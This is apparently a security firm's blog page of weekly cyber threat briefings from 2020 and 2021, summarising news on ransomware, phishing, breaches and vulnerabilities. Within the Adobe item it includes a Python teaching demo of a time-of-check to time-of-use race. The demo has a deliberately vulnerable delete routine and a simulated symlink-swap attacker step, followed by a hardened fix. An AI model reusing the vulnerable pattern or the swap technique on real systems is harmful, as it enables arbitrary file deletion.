Threat Intelligence Blog
Black Arrow Cyber Threat Briefing 22 January 2021
Black Arrow Cyber Threat Briefing 22 January 2021: Ransomware Biggest Cyber Concern; Ransomware Payments Grew 311% In 2020; Cyber Security Spending To Soar In 2021; Ransomware Provides The Perfect Cover For Other Attacks; GDPR Fines Skyrocket As EU Gets Tough On Data Breaches; Popular PDF Reader Has Database Of 77 Million Users Leaked Online; Malware Incidents On Remote Devices Increase
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities and cyber related news from the last week.
Top Cyber Headlines of the Week
Ransomware is now the biggest Cyber Security concern for CISOs
Ransomware is the biggest cyber security concern facing businesses, according to those responsible for keeping organisations safe from hacking and cyber attacks. A survey of chief information security officers (CISOs) and chief security officers (CSOs) found that ransomware is now viewed as the main cyber security threat to their organisation over the course of the next year. Almost half – 46% – of CISOs and CSOs surveyed said that ransomware or other forms of extortion by outsiders represents the biggest cyber security threat.
https://www.zdnet.com/article/ransomware-is-now-the-biggest-cybersecurity-concern-for-cisos/
Crypto ransomware payments grew 311% in 2020
Crypto payments associated with ransomware grew at least 311% in 2020. “Ransomware” refers to a category of malicious computer programs that force users into paying ransoms. Just 0.34% of all cryptocurrency transactions last year were criminal, down from 2.1% in 2019. But that number is bound to go up, said Chainalysis, the firm behind the report.
https://decrypt.co/54648/crypto-crime-ransomware-chainalysis-report-2020
The SolarWinds hackers used tactics other groups will copy
One of the most chilling aspects of Russia's recent hacking spree—which breached numerous United States government agencies among other targets—was the successful use of a “supply chain attack” to gain tens of thousands of potential targets from a single compromise at the IT services firm SolarWinds. But this was not the only striking feature of the assault. After that initial foothold, the attackers bored deeper into their victims' networks with simple and elegant strategies. Now researchers are bracing for a surge in those techniques from other attackers.
https://www.wired.com/story/solarwinds-hacker-methods-copycats/
Global Cyber Security spending to soar in 2021
The worldwide cyber security market is set to grow by up to 10% this year to top $60bn, as the global economy slowly recovers from the pandemic. Double-digit growth from $54.7bn in 2020 would be the best-case scenario. However, even in the worst case, cyber security spending would still grow by 6.6%. That scenario factors in a deeper-than-anticipated economic impact from lockdowns, although the security market has proven remarkably resilient so far to the pandemic-induced global economic crisis. That said, SMB spending was hit hard last year, along with certain sectors such as hospitality, retail and transport.
https://www.infosecurity-magazine.com/news/global-cybersecurity-spending-to/
Cyber criminals publish more than 4,000 stolen Sepa files
Sepa rejected a ransom demand for the attack, which has been claimed by the international Conti ransomware group. Contracts, strategy documents and databases are among the 4,000 files released. The data has been put on the dark web - a part of the internet associated with criminality and only accessible through specialised software.
https://www.bbc.co.uk/news/uk-scotland-55757884
Ransomware provides the perfect cover for other attacks
Look at any list of security challenges that CISOs are most concerned about and you’ll consistently find ransomware on it. It’s no wonder: ransomware attacks cripple organisations through the costs of downtime, recovery, regulatory penalties and lost revenue. Unfortunately, cyber criminals have added an extra sting to these attacks: they are using ransomware as a smokescreen to divert security teams from other clandestine activities behind the scenes.
https://www.helpnetsecurity.com/2021/01/21/ransomware-cover/
Popular PDF reader has database of 77 million users hacked and leaked online
A threat actor has leaked a 14 GB database online containing over 77 million records relating to thousands of users of the Nitro PDF reader software, with users' email addresses, full names, hashed passwords, company names, IP addresses, and other system-related information.
Ransomware victims that have backups are paying ransoms to stop hackers leaking their stolen data
Some organisations that fall victim to ransomware attacks are paying ransoms to cyber-criminal gangs despite being able to restore their own networks from backups, in order to prevent hackers publishing stolen data. Over the course of the past year, many of the most successful ransomware gangs have added an additional technique in an effort to coerce victims into paying ransoms after compromising their networks – publishing stolen data if a payment isn't received.
GDPR fines skyrocket as EU gets tough on data breaches
Europe’s new privacy protection regime has led to a surge in fines for bad actors, according to research published today. Law firm DLA Piper says that, since January 28th, 2020, the EU has issued around €158.5 million (around $192 million) in financial penalties. That’s a 39-percent increase on the previous 20-month period Piper examined in its report, published this time last year. And as well as the increased fines, the number of breach notifications has shot up by 19 percent across the same 12-month period.
https://www.engadget.com/gdpr-fines-dla-piper-report-144510440.html
Malware incidents on remote devices increase
Of the devices compromised by malware in 2020, 37% continued accessing corporate email after being compromised and 11% continued accessing cloud storage, highlighting a need for organisations to better determine how to configure business tools to ensure fast and safe connectivity for all users in 2021.
https://www.helpnetsecurity.com/2021/01/18/malware-incidents-remote-devices/
Threats
Vulnerabilities
Signal and other video chat apps found to have some major security flaws
Automated exploit of critical SAP SolMan vulnerability detected in the wild
List of DNSpooq vulnerability advisories, patches, and updates
Dnsmasq vulnerabilities open networking devices, Linux distros to DNS cache poisoning
New FreakOut botnet targets Linux systems running unpatched software
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our weekly ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 13 November 2020
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities and cyber related news from the last week.
Top Cyber Headlines of the Week
Five Emerging Cyber-Threats to Watch Out for in 2021
What was the driving force behind your company’s digital strategy in 2020? Was it your CEO? Probably not. Your CTO or CISO? Perhaps.
For most organisations, it was COVID-19. In 2019, one company after another said: “work-from-home isn’t an option for us” or “we aren’t interested in shifting operations to the cloud.”
Then everything changed. The pandemic drove a massive shift towards remote work. For many companies, this wasn’t even an option — it was a case of ‘do or die.’
By April 2020, almost half of the American workforce was working from home. As organisations and employees become more comfortable with this, we shouldn’t expect a full return to the traditional in-office model anytime soon, if ever. Work-from-anywhere is the new way of doing business, with employees accessing cloud services, collaborative tools and remote systems from home and public networks – and not always through the safety of a VPN.
https://www.infosecurity-magazine.com/blogs/five-cyber-threats-2021/
Guernsey law firm fined £10,000 for data security breach
Trinity Chambers LLP sent private details about an individual and their family via email and post, the Office of the Data Protection Authority (ODPA) found.
It said a lack of security had given "unconnected" third parties access to the data.
The breach of data by Trinity was the result of "repeated human error", an investigation found.
https://www.bbc.co.uk/news/world-europe-guernsey-54854333
Every employee has a cyber security blind spot
80% of companies say that an increased cyber security risk caused by human factors has posed a challenge during the COVID-19 pandemic, particularly in times of heightened stress.
A new report explores the role employees and their personality play in keeping organisations safe from cyber threats. Its findings include:
· Cyber crime has increased by 63% since the COVID-19 lockdown was introduced
· Human error has been the biggest cyber security challenge during the COVID-19 pandemic, according to CISOs
· Just a quarter of businesses consider their remote working strategy effective
· 47% of people are concerned about their ability to manage stress during the coronavirus crisis
https://www.helpnetsecurity.com/2020/11/09/cybersecurity-blind-spot/
Zoom settles FTC charges for misleading users about security features
Video conferencing software maker Zoom has reached a deal today with the US Federal Trade Commission to settle accusations that it misled users about some of its security features.
During the height of the COVID-19 pandemic, Zoom had attracted users to its platform with misleading claims that its product supported "end-to-end, 256-bit encryption" and that its service would store recorded calls in an encrypted format.
However, in a complaint filed earlier this year, the investigators found that Zoom's claims were deceptive.
Despite claiming to support end-to-end encrypted (E2EE) calls, Zoom didn't support E2EE calls in the classic meaning of the word.
https://www.zdnet.com/article/zoom-settles-ftc-charges-for-misleading-users-about-security-features/
Threats
Ransomware
How Ryuk Ransomware operators made $34 million from one victim
One hacker group that is targeting high-revenue companies with Ryuk ransomware received $34 million from one victim in exchange for the decryption key that unlocked their computers.
The threat actor is highly proficient at moving laterally inside a compromised network and erasing as much of their tracks as possible before detonating Ryuk ransomware.
Ransomware hits e-commerce platform X-Cart
E-commerce software vendor X-Cart suffered a ransomware attack at the end of October that brought down customer stores hosted on the company's hosting platform.
The incident is believed to have taken place after attackers exploited a vulnerability in third-party software to gain access to X-Cart's store hosting systems.
https://www.zdnet.com/article/ransomware-hits-e-commerce-platform-x-cart
Linux version of RansomEXX ransomware discovered
Researchers have discovered a Linux version of the RansomEXX ransomware, marking the first time a major Windows ransomware strain has been ported to Linux to aid in targeted intrusions.
RansomEXX is a relatively new ransomware strain that was first spotted earlier this year in June.
https://www.zdnet.com/article/linux-version-of-ransomexx-ransomware-discovered/
Laptop mega-manufacturer Compal hit by DoppelPaymer ransomware – same one that hit German hospital
Compal, the world’s second-largest white-label laptop manufacturer, has been hit by the file-scrambling DoppelPaymer ransomware gang – and the hackers want $17m in cryptocurrency before they'll hand over the decryption key.
The Taiwanese factory giant, which builds systems for Apple, Lenovo, Dell, and HP, finally admitted malware infected its computers and encrypted its documents after first insisting it had suffered no more than an IT "abnormality" and that its staff had beaten off a cyber-attack.
https://www.theregister.com/2020/11/09/compal_ransomware_report/
Capcom hit by ransomware attack, is reportedly being extorted for $11 million
Earlier this week it emerged that games publisher Capcom's internal systems had been hacked, though the company claimed that no customer data was affected.
It has now emerged that the publisher was targeted by the Ragnar Locker ransomware, software designed to exfiltrate information from internal networks before encrypting the lot: at which point the victim is locked-out, contacted, and extorted.
Business Email Compromise (BEC)
Jersey business targeted in £130,000 invoice scam
A Jersey building company has been targeted by a sophisticated impersonation scam, which saw fraudsters intercept more than £130,000 in invoice payments.
The owners, who wish to remain anonymous, said they were "left reeling" after realising their email correspondence with a customer had been hacked, and payments diverted to a scam bank account.
After taking swift action, they were able to recover all their money, but they now want to make sure other islanders do not fall victim. They are encouraging businesses in particular to be "extra vigilant".
https://www.itv.com/news/channel/2020-11-13/jersey-business-targeted-in-130000-invoice-scam
Phishing
Smishing attack tells you “mobile payment problem” – don’t fall for it!
As we’ve warned before, phishing via SMS, or smishing for short, is still popular with cybercriminals.
Sure, old-fashioned text messages have fallen out of favour for personal communications, superseded round the world by instant messaging apps such as WhatsApp, WeChat, Instagram, Telegram and Signal.
But for brief, one-off business communications such as “Your home delivery will arrive at 11:30 today” or “Your one-time login code is 217828”, SMS is still a popular and useful messaging system.
That’s because pretty much every mobile phone in the world can receive text messages, regardless of its age, feature set or ability to access the internet.
Even if you’ve got no credit to send messages or make calls, no third-party apps installed, and no Wi-Fi connectivity, SMSes sent to you will still show up.
Malware
Play Store identified as main distribution vector for most Android malware
The official Google Play Store has been identified as the primary source of malware installs on Android devices in a recent academic study — considered the largest one of its kind carried out to date.
Using telemetry data, researchers analysed the origin of app installations on more than 12 million Android devices for a four-month period between June and September 2019.
In total, researchers looked at more than 34 million APK (Android application) installs for 7.9 million unique apps.
This new malware wants to add your Linux servers and IoT devices to its botnet
A new form of malware is targeting Linux servers and Internet of Things (IoT) devices and adding them to a botnet in what appears to be the first stage of a hacking campaign targeting cloud-computing infrastructure – although the purpose of the attacks remains unclear.
The malicious worm has been dubbed Gitpaste-12, reflecting on how it uses GitHub and Pastebin for housing component code and has 12 different means of compromising Linux-based x86 servers, as well as Linux ARM- and MIPS-based IoT devices.
New 'Ghimob' malware can spy on 153 Android mobile applications
Security researchers have discovered a new Android banking trojan that can spy and steal data from 153 Android applications.
Named Ghimob, the trojan is believed to have been developed by the same group behind the Astaroth (Guildma) Windows malware, according to a report published.
Distribution was never carried out via the official Play Store.
Instead, the Ghimob group used emails or malicious sites to redirect users to websites promoting Android apps.
https://www.zdnet.com/article/new-ghimob-malware-can-spy-on-153-android-mobile-applications/
Microsoft Teams Users Under Attack in ‘Fake Updates’ Malware Campaign
Attackers are using ads for fake Microsoft Teams updates to deploy backdoors, which use Cobalt Strike to infect companies’ networks with malware.
The campaign is targeting various types of companies, with recent targets in the K-12 education sector, where organisations are currently dependent on using apps like Teams for videoconferencing due to COVID-19 restrictions.
Cobalt Strike is a commodity attack-simulation tool that’s used by attackers to spread malware, particularly ransomware. Recently, threat actors were seen using Cobalt Strike in attacks exploiting Zerologon, a privilege-elevation flaw that allows attackers to access a domain controller and completely compromise all Active Directory identity services.
https://threatpost.com/microsoft-teams-fakeupdates-malware/161071/
DDoS
DDoS attacks are cheaper and easier to carry out than ever before
DDoS attacks are getting more complex and more sophisticated while also getting cheaper and easier to carry out as cyber criminals take advantage of the sheer number of insecure internet-connected devices.
Distributed Denial of Service attacks have been a problem for many years, with cyber attackers gaining control of armies of devices and directing their internet traffic at targets in order to take the victim offline.
The disruption causes problems for both businesses and individual users who are prevented from accessing digital services they require – and that's especially a problem as 2020's coronavirus pandemic has forced people to be more reliant on digital services than ever before.
https://www.zdnet.com/article/ddos-attacks-are-cheaper-and-easier-to-carry-out-than-ever-before/
IoT
IoT security is a mess. These guidelines could help fix that
The supply chain around the Internet of Things (IoT) has become the weak link in cyber security, potentially leaving organisations open to cyber attacks via vulnerabilities they're not aware of. But a newly released set of guidelines aims to ensure that security forms part of the entire lifespan of IoT product development.
The Guidelines for Securing the IoT – Secure Supply Chain for IoT report from the European Union Agency for Cybersecurity (ENISA) sets out recommendations throughout the entire IoT supply chain to help keep organisations protected from vulnerabilities that can arise when building connected things.
https://www.zdnet.com/article/iot-security-is-a-mess-these-guidelines-could-help-fix-that/
Vulnerabilities
Windows 10 update created a major password problem
A temporary fix has been issued for a frustrating Windows 10 bug that prevents software from storing account credentials, meaning users must re-enter their username and password each time they log in.
The flaw is also said to delete cookies held in web browsers, preventing websites from memorising credentials and serving bespoke content to the user.
First reported in April, the issue is present in specific builds of Windows 10 version 2004 and affects applications such as Outlook, Chrome, Edge, OneDrive and more.
https://www.techradar.com/news/windows-10-update-made-a-right-mess-of-this-basic-password-feature
Colossal Intel Update Anchored by Critical Privilege-Escalation Bugs
A massive Intel security update this month addresses flaws across a myriad of products – most notably, critical bugs that can be exploited by unauthenticated cyber criminals in order to gain escalated privileges.
These critical flaws exist in products related to Wireless Bluetooth – including various Intel Wi-Fi modules and wireless network adapters – as well as in its remote out-of-band management tool, Active Management Technology (AMT).
Overall, Intel released 40 security advisories on Tuesday, each addressing critical-, high- and medium-severity vulnerabilities across various products. That by far trumps October’s Intel security update, which resolved one high-severity flaw.
https://threatpost.com/intel-update-critical-privilege-escalation-bugs/161087/
Hackers are exploiting unpatched VoIP flaws to compromise business accounts
A hacking campaign has compromised VoIP (Voice over Internet Protocol) phone systems at over 1,000 companies around the world over the past year, in a campaign designed to profit from selling compromised accounts.
While the main purpose appears to be dialling premium rate numbers owned by attackers or selling phone numbers and call plans that others can use for free, access to VoIP systems could provide cyber criminals with the ability to conduct other attacks, including listening to private calls, cryptomining, or even using compromised systems as a steppingstone towards much more intrusive campaigns.
One hacking group has compromised the VoIP networks of almost 1,200 organisations in over 20 countries by exploiting the vulnerability, with over half the victims in the UK. Industries including government, military, insurance, finance and manufacturing are believed to have fallen victim to the campaign.
Google patches two more Chrome zero-days
Google has released today Chrome version 86.0.4240.198 to patch two zero-day vulnerabilities that were exploited in the wild.
These two bugs mark the fourth and fifth zero-days that Google has patched in Chrome over the past three weeks.
The difference this time is that while the first three zero-days were discovered internally by Google security researchers, these two new zero-days came to Google's attention after tips from anonymous sources.
https://www.zdnet.com/article/google-patches-two-more-chrome-zero-days/
Data Breaches
Ticketmaster fined £1.25m over payment data breach
Ticketmaster UK has been fined £1.25m for failing to keep its customers' personal data secure.
The fine was issued by the Information Commissioner's Office (ICO) following a cyber-attack on the Ticketmaster website in 2018.
The ICO said personal information and payment details had potentially been stolen from more than nine million customers in Europe.
https://www.bbc.co.uk/news/technology-54931873
Millions of Hotel Guests Worldwide Caught Up in Mass Data Leak
A cloud misconfiguration affecting users of a popular reservation platform threatens travellers with identity theft, scams, credit-card fraud and vacation-stealing.
A widely used hotel reservation platform has exposed 10 million files related to guests at various hotels around the world, thanks to a misconfigured Amazon Web Services S3 bucket. The records include sensitive data, including credit-card details.
Prestige Software’s “Cloud Hospitality” is used by hotels to integrate their reservation systems with online booking websites like Expedia and Booking.com.
https://threatpost.com/millions-hotel-guests-worldwide-data-leak/161044/
DWP exposed 6,000 people’s data online for two years
The Department for Work and Pensions (DWP) has removed the personal details of thousands of people after they were exposed online for two years.
The files, published in March and June 2018, listed routine payments to the outsourcing giant Capita and included the National Insurance (NI) numbers of approximately 6,000 people, according to the Mirror. These individuals were believed to be applying for the disability benefit, PIP. No other personal data was exposed in the incident.
https://www.itpro.co.uk/security/data-breaches/357724/dwp-data-breach-exposed-6000-ni-numbers
Data breach at Mashable leaks users’ personal information online
Technology and culture news website Mashable has announced that the personal data of users has been discovered in a leaked database posted on the internet.
In a statement issued this week, Mashable confirmed that a database containing information from readers who made use of the platform’s social media sign-in feature had been found online.
The media company said that “a hacker known for targeting websites and apps” was responsible for the breach. The suspect has not been named.
Leaked data is said to include the full names, locations, email addresses, genders, IP addresses, and links to social media profiles of users.
Other News
Try to avoid thinking of the internet as a flashy new battlefield, warns former NCSC chief
https://www.theregister.com/2020/11/11/ciaran_martin_speech_cyber_policy/
Microsoft says three APTs have targeted seven COVID-19 vaccine makers
https://www.zdnet.com/article/microsoft-says-three-apts-have-targeted-seven-covid-19-vaccine-makers/
New stealthy hacker-for-hire group mimics state-backed attackers
Cyber Weekly Flash Briefing for 27 March 2020 – Half of UK firms suffer breach last year, COVID19 drives phishing up 667%, WHO targeted, Windows zero-day, ransom refuser’s data published online
The Importance of Maintaining Good Cyber Hygiene During the Coronavirus Crisis
Businesses are making significant changes in response to the virus, including asking employees to work from home for the first time. These new practices have often been implemented as quickly as possible, with a priority on keeping the business operations going.
At the same time, the cyber and information security consultants at Black Arrow are seeing reports from specialist intelligence and the wider media which show cyber criminals are feasting on the current chaos as they target employees and companies who let their guard down.
‘Cyber criminals usually target people, not technology, to get into their employer’s systems. Companies need to ensure they consider all the basic risks to prevent this, and implement layers of defence that start with the user.’
Read more here: https://guernseypress.com/news/2020/03/24/maintaining-good-cyber-hygiene/
Half of all UK Firms and Three-Quarters of Large Firms Suffered Security Breach Last Year
Nearly half (46%) of UK firms reported suffering a security breach or cyber-attack over the past year, an increase on previous years, but they are getting better at recovering from and deflecting such blows, according to the government.
The annual Cyber Security Breaches Survey revealed an increase in the overall volume of businesses reporting incidents, up from 32%. The number of medium (68%) and large (75%) businesses reporting breaches or attacks also jumped, from 60% and 61% respectively.
This puts the 2020 report’s findings in line with the first government analysis in 2017, it claimed.
Of those businesses that reported incidents, more are experiencing these at least three times a week than in 2017 (32% versus 22%).
The government also claimed that organisations are experiencing more phishing attacks (from 72% to 86%) whilst fewer are seeing malware (from 33% to 16%) than three years ago.
More here: https://www.infosecurity-magazine.com/news/threequarters-firms-security/
#COVID19 Drives Phishing Emails Up 667% in Under a Month
Phishing emails have spiked by over 600% since the end of February as cyber-criminals look to capitalize on the fear and uncertainty generated by the COVID-19 pandemic.
A security vendor observed just 137 incidents in January, rising to 1188 in February and 9116 so far in March. Around 2% of the 468,000 global email attacks detected by the firm were classified as COVID-19-themed.
As is usually the case, the attacks used widespread awareness of the subject to trick users into handing over their log-ins and financial information, and/or unwittingly downloading malware onto their computers.
Of the COVID-19 phishing attacks, 54% were classified as scams, 34% as brand impersonation attacks, 11% blackmail and 1% as business email compromise (BEC).
As well as the usual lures to click through for more information on the pandemic, some scammers are claiming to sell cures and/or face-masks, while others try to elicit investment in companies producing vaccines, or donations to fight the virus and provide support to victims.
This is a new low for cyber criminals, who are acting like piranha fish, cowardly attacking people en masse when they are at their most vulnerable. It’s vital that the public remain vigilant against scam emails during this challenging time.
More here: https://www.infosecurity-magazine.com/news/covid19-drive-phishing-emails-667/
Attackers exploiting critical zero-day Windows flaw
Microsoft has discovered a severe vulnerability in all supported versions of Windows, which enables criminals to remotely run malware – including ransomware – on a target machine.
According to the report, the security vulnerability has not been previously disclosed and there is currently no fix.
The “critical” vulnerability revolves around how the operating system handles and renders fonts. All it takes is for the victim to open or preview a malicious document, and the attacker can remotely run different forms of malware.
Microsoft said the vulnerability is being exploited in the wild, and different hacking groups are initiating “limited, targeted attacks”.
Although there is as yet no patch, the company announced a temporary workaround for affected Windows users, which involves disabling the Preview and Details panes in Windows Explorer.
Read more here: https://www.itproportal.com/news/attackers-exploiting-critical-zero-day-windows-flaw/
WHO Targeted in Espionage Attempt, COVID-19 Cyberattacks Spike
The DarkHotel group could have been looking for information on tests, vaccines or trial cures.
The World Health Organization (WHO) has attracted the notice of cybercriminals as the worldwide COVID-19 pandemic continues to play out, with a doubling of attacks recently, according to officials there. Problematically, evidence has also now apparently surfaced that the DarkHotel APT group has tried to infiltrate its networks to steal information.
A cyber security researcher told Reuters that he personally observed a malicious site being set up on March 13 that mimicked the WHO’s internal email system. He said its purpose was to steal passwords from multiple agency staffers, and noted that he realised “quite quickly that this was a live attack on the World Health Organization in the midst of a pandemic.”
The attack appeared to be aimed at achieving a foothold at the agency rather than being an end unto itself. The targeting infrastructure seems to focus on certain types of healthcare and humanitarian organisations that are uncommon for cybercriminals and this could suggest the actor or actors behind the attacks are more interested in gathering intelligence, rather than being financially motivated.
Read the full article here: https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/
Stolen data of company that refused REvil ransom payment now on sale
Operators of the Sodinokibi (aka Sodin or REvil) Ransomware as a Service (RaaS) recently published over 12GB of data that allegedly belongs to one of its victims – Brooks International – that refused to pay ransom.
RaaS is the malware for lazy crooks who just want to launch attacks at the press of a button: it enables novice cybercriminals to build automated campaigns using third-party kits sold on the dark web. They don’t have to break a sweat by learning about malware, teaching themselves how encryption works, writing ransomware code, running an anonymous webserver on Tor to collect the loot, distributing decryption keys, or otherwise getting their hands dirty with technical details.
Sodinokibi – a GandCrab derivative blamed for numerous attacks that took place last year – is a prime example of RaaS.
IT security report finds 97% of enterprise networks have suspicious network activity
A study using advanced network traffic analysis tools found that 97% of the surveyed companies show evidence of suspicious activity in their network traffic and that 81% of the companies were being subject to malicious activity.
More here: https://www.techrepublic.com/article/it-security-report-finds-97-have-suspicious-network-activity/
Concern over Zoom video conferencing after MoD bans it over security fears
Concerns have been raised over the security of video conferencing service Zoom after the Ministry of Defence banned staff from using it.
Downing Street published pictures of Prime Minister Boris Johnson using the app to continue holding Cabinet meetings with senior MPs – where sensitive information like matters of national security are discussed – while observing rules on social distancing to curb the coronavirus outbreak.
But MoD staff were told this week that use of the software was being suspended with immediate effect while ‘security implications’ were investigated, with users reminded of the need to be ‘cautious about cyber resilience’ in ‘these exceptional times’.
One source commented that ‘it is astounding that thousands of MoD staff have been banned from using Zoom only to find a sensitive Government meeting like that of the Prime Minister’s Cabinet is being conducted over it’.
A message to MoD staff said: ‘We are pausing the use of Zoom, an internet-based video conferencing service, with immediate effect whilst we investigate security implications that come with it.’ The email added that a decision will then be made about whether to continue using the programme.
More here: https://metro.co.uk/2020/03/25/concern-zoom-video-conferencing-mod-bans-security-fears-12455327/
Adobe issues emergency fix for file-munching bug
Adobe has released another security patch outside of its usual routine this month to deal with a strange bug that can allow attackers to delete victims’ files.
The file-deleting bug stems from a time-of-check to time-of-use race condition vulnerability, which happens when two system operations try to access shared data at the same time. That allows an attacker to manipulate files on the victim’s system. The company warned that successful exploitation could lead to arbitrary file deletion.
To successfully exploit the flaw, an attacker would need to convince a victim to open a malicious file, Adobe has said.
More here: https://nakedsecurity.sophos.com/2020/03/26/adobe-issues-emergency-fix-for-file-munching-bug/
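The time-of-check to time-of-use (TOCTOU) class described above is easier to reason about with the two halves side by side. The following is an added example written for this briefing, not Adobe's code and not the bug in the article: it shows a check-then-delete routine that walks a path string twice, and a hardened variant that pins the directory to an open descriptor so a rename or symlink placed between the check and the unlink cannot redirect the deletion. The "attacker" is a constructed hook called at the race window so the demonstration is deterministic; the directory names and file contents are constructed, and the code assumes a POSIX system (Linux), whereas the Adobe bug affected Windows.

```python
import os
import stat
import tempfile


def simulated_attacker_swap(scratch, victim):
    """Constructed attacker step for the demo: between the program's check
    and its unlink, replace the scratch directory with a symlink pointing at
    a directory the attacker wants files deleted from."""
    os.rename(scratch, scratch + ".moved")
    os.symlink(victim, scratch)


def delete_vulnerable(scratch, name, race_hook=lambda: None):
    """Check-then-act on a path string: the check and the unlink each walk
    the path separately, so the filesystem can change in between."""
    target = os.path.join(scratch, name)
    if os.path.islink(scratch) or not os.path.isfile(target):
        raise ValueError("refusing: unexpected path")
    race_hook()  # the attacker's window (a real race, not a hook, in practice)
    os.unlink(target)  # re-walks `scratch`, which is now the attacker's symlink


class PinnedDir:
    """Hardened variant: open the directory once, keep the descriptor, and do
    every later check and action relative to that descriptor. A later rename
    or symlink at the path cannot redirect an already-open descriptor."""

    def __init__(self, path):
        self.fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)

    def delete(self, name, race_hook=lambda: None):
        if name in ("", ".", "..") or os.sep in name:
            raise ValueError("refusing: name must be a single path component")
        st = os.stat(name, dir_fd=self.fd, follow_symlinks=False)
        if not stat.S_ISREG(st.st_mode):
            raise ValueError("refusing: not a regular file")
        race_hook()  # same attacker window, but it no longer matters
        os.unlink(name, dir_fd=self.fd)  # acts inside the pinned directory

    def close(self):
        os.close(self.fd)


def demonstrate():
    """Run both variants against a freshly constructed layout and report
    whether the victim's file survived: vulnerable -> False, hardened -> True."""
    outcome = {}
    for variant in ("vulnerable", "hardened"):
        base = tempfile.mkdtemp(prefix="toctou-demo-")
        victim = os.path.join(base, "victim")
        scratch = os.path.join(base, "scratch")
        os.mkdir(victim)
        os.mkdir(scratch)
        for d in (victim, scratch):
            with open(os.path.join(d, "secret.txt"), "w") as fh:
                fh.write("constructed sample content\n")

        def hook(scratch=scratch, victim=victim):
            simulated_attacker_swap(scratch, victim)

        if variant == "vulnerable":
            delete_vulnerable(scratch, "secret.txt", hook)
        else:
            pinned = PinnedDir(scratch)
            pinned.delete("secret.txt", hook)
            pinned.close()
        outcome[variant] = os.path.exists(os.path.join(victim, "secret.txt"))
    return outcome


if __name__ == "__main__":
    print(demonstrate())
```

The hardened version does not add more checks; it changes what the checks are performed against. Once the directory is held as a descriptor, `os.stat(..., dir_fd=...)` and `os.unlink(..., dir_fd=...)` resolve the name inside that specific directory inode, which is why the attacker's swap of the path no longer changes the outcome.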
Emerging Chinese APT Group ‘TwoSail Junk’ Mounts Mass iPhone Surveillance Campaign
The malware, the work of a new APT called TwoSail Junk, allows deep surveillance and total control over iOS devices.
A recently discovered, mass-targeted watering-hole campaign has been aiming at Apple iPhone users in Hong Kong – infecting website visitors with a newly developed custom surveillance malware. The bad code – the work of a new APT called “TwoSail Junk” – is delivered via a multistage exploit chain that targets iOS vulnerabilities in versions 12.1 and 12.2 of Apple’s operating system, according to researchers.
Watering-hole campaigns make use of malicious websites that lure visitors in with targeted content – cyberattackers often post links to that content on discussion boards and on social media to cast a wide net. When visitors click through to a malicious website, background code will then infect them with malware.
Read the full article here: https://threatpost.com/emerging-apt-mounts-mass-iphone-surveillance-campaign/154192/
New attack on home routers sends users to spoofed sites that push malware
A recently discovered hack of home and small-office routers is redirecting users to malicious sites that pose as COVID-19 informational resources in an attempt to install malware that steals passwords and cryptocurrency credentials, researchers said on Wednesday.
The compromises are hitting Linksys routers and D-Link devices.
It remains unclear how attackers are compromising the routers. The researchers suspect that the hackers are guessing passwords used to secure routers’ remote management console when that feature is turned on. It was also hypothesised that compromises may be carried out by guessing credentials for users’ Linksys cloud accounts.
Russia’s FSB wanted its own IoT botnet
If you thought the Mirai botnet was bad, what about a version under the control of Russia’s military that it could point like an electronic cannon at people it didn’t like? That’s the prospect we could face after the reported emergence of secret Russian project documents online last week.
The documents, which come from hacking group Digital Revolution but haven’t been verified, suggest that Russia’s Federal Security Service (in Russian, the FSB), has been working on an internet of things (IoT) botnet of its own called Fronton.
Mirai was a botnet that infected IoT devices by the million, taking advantage of default login credentials to co-opt them for attackers. They then pointed it at DNS service provider Dyn, mounting a DDoS attack that took down large internet services for hours.
More here: https://nakedsecurity.sophos.com/2020/03/24/russias-fsb-wanted-its-own-iot-botnet/
Cyber Weekly Flash Briefing for 06 March 2020 phishing scams exploiting coronavirus, Boots Advantage and Tesco Clubcard hit in the same week, Android patches, ransomware takes legal giant offline
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Nasty phishing scams aim to exploit coronavirus fears
Phoney emails about health advice and more are being used to steal login credentials and financial details.
Cyber criminals are aiming to take advantage of fears over coronavirus as a means of conducting phishing attacks and spreading malware, along with stealing login credentials and credit card details.
Cybersecurity companies have identified a number of campaigns by hackers who are attempting to exploit concerns about the COVID-19 outbreak for their own criminal ends. Crooks often use current affairs to make their scams more timely.
Researchers have identified a Trickbot banking trojan campaign specifically targeting Italian email addresses in an attempt to play on worries about the virus. The phishing email comes with a Word document which claims to contain advice on how to prevent infection – but this attachment is in fact a Visual Basic for Applications (VBA) script which drops a new variant of Trickbot onto the victim's machine.
The message text claims to offer advice from the World Health Organization (WHO) in a Word document which claims to be produced using an earlier version of Microsoft Word which means the user needs to enable macros in order to see the content. By doing this, it executes a chain of commands which installs Trickbot on the machine.
Read more here: https://www.zdnet.com/article/nasty-phishing-scams-aim-to-exploit-coronovirus-fears/
Backdoor malware is being spread through fake security certificate alerts
Victims of this new technique are invited to install a malicious "security certificate update" when they visit compromised websites.
Backdoor and Trojan malware variants are being distributed through a new phishing technique that attempts to lure victims into accepting an "update" to website security certificates.
Certificate Authorities (CAs) issue SSL/TLS certificates that provide both encryption of the communication channel between a browser and server, especially important for domains providing e-commerce services, and identity validation, which is intended to instil trust in a domain.
Read the full article here: https://www.zdnet.com/article/backdoor-malware-is-being-spread-through-fake-security-certificate-alerts/
Boots Advantage and Tesco Clubcard both suffer data breaches in same week
Boots has blocked all Advantage card holders from ‘paying with points’ after 150,000 accounts were subjected to attempted hacks using stolen passwords.
The news comes just days after Tesco said it would issue replacement Clubcards to more than 620,000 customers after a similar security breach.
Read more here: https://www.which.co.uk/news/2020/03/boots-advantage-card-tesco-clubcard-both-suffer-data-breaches-in-same-week/
Academics find 30 file upload vulnerabilities in 23 web apps, CMSes, and forums
